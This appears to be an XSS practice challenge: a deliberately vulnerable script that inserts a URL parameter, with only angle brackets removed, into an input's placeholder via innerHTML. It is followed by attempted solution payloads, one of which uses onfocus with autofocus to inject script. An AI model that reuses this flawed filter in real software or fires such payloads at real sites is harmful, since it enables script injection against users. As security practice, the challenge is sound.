Ugandan Knuckles

<!-- Challenge -->
<div id="uganda"></div>
<script>
    let wey = (new URL(location).searchParams.get('wey') || "do you know da wey?");
    wey = wey.replace(/[<>]/g, '')
    uganda.innerHTML = `<input type="text" placeholder="${wey}" class="form-control">`
</script>

http://localhost:8000/test.html?wey=test

localhost:8000/test.html?wey=a"eval(alert(123));"
localhost:8000/test.html?wey=a"onchange="alert(123);document.getElementById('uganda').innerHTML=b;""
localhost:8000/test.html?wey=a"onchange="document.getElementById('uganda').innerHTML=b;""
localhost:8000/test.html?wey=a"onfocus="alert(1)" autofocus=""
